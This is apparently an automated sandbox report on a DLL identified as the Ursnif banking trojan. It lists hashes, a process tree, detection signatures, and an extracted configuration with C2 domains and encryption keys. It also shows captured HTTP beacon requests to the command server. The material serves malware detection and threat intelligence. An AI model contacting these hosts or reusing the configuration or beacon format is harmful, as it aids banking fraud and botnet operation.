Play interactive tour

Edit tour

Windows Analysis Report 3b17.dll

Overview

General Information

Sample Name:	3b17.dll
Analysis ID:	444315
MD5:	3b17fcc55cee8cbe4cd1b443f358c36d
SHA1:	45d1e652f282a94b37ac32afb62ff563afb2fb39
SHA256:	9ae13bdb906bf774982242a378a20fb25da3e29dd7b5e1acd2531562319edba6
Tags:	dllgozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4876 cmdline: loaddll32.exe 'C:\Users\user\Desktop\3b17.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 3868 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4576 cmdline: rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 244 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5928 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3012 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5912 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Time MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 3472 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4792 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 2996 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4576	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 4876	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.54194a0.4.raw.unpack	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.54194a0.2.raw.unpack	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.30194a0.2.raw.unpack	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000003.286056842.0000000000800000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: 3b17.dll	Metadefender: Detection: 22%			Perma Link
Source: 3b17.dll	ReversingLabs: Detection: 55%

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

3_2_00E839C5

Source: 3b17.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 3b17.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49723 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49734 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49736 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49736 -> 165.232.183.49:80

Source: Joe Sandbox View

ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS

Source: global traffic	HTTP traffic detected: GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: gtr.antoinfer.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:53:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC
Source: ~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr	String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6
Source: rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.dr	String found in binary or memory: http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_00E839C5

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E191B9C GetProcAddress,NtCreateSection,memset,	0_2_6E191B9C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E191EC7 NtMapViewOfSection,	0_2_6E191EC7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E192485 NtQueryVirtualMemory,	0_2_6E192485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E82D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_00E82D06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E88005 NtQueryVirtualMemory,	3_2_00E88005

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E192264	0_2_6E192264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1EB617	0_2_6E1EB617
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F862F	0_2_6E1F862F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1ED6B0	0_2_6E1ED6B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E1727	0_2_6E1E1727
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1EDC20	0_2_6E1EDC20
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E208CB7	0_2_6E208CB7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F0534	0_2_6E1F0534
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F8AA2	0_2_6E1F8AA2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2162C0	0_2_6E2162C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1EAB67	0_2_6E1EAB67
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E208B97	0_2_6E208B97
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1EE050	0_2_6E1EE050
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F8861	0_2_6E1F8861
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F917A	0_2_6E1F917A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E82206	3_2_00E82206
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E87DE0	3_2_00E87DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E83109	3_2_00E83109
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1EB617	3_2_6E1EB617
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F862F	3_2_6E1F862F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F9653	3_2_6E1F9653
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1ED6B0	3_2_6E1ED6B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F8F15	3_2_6E1F8F15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1E1727	3_2_6E1E1727
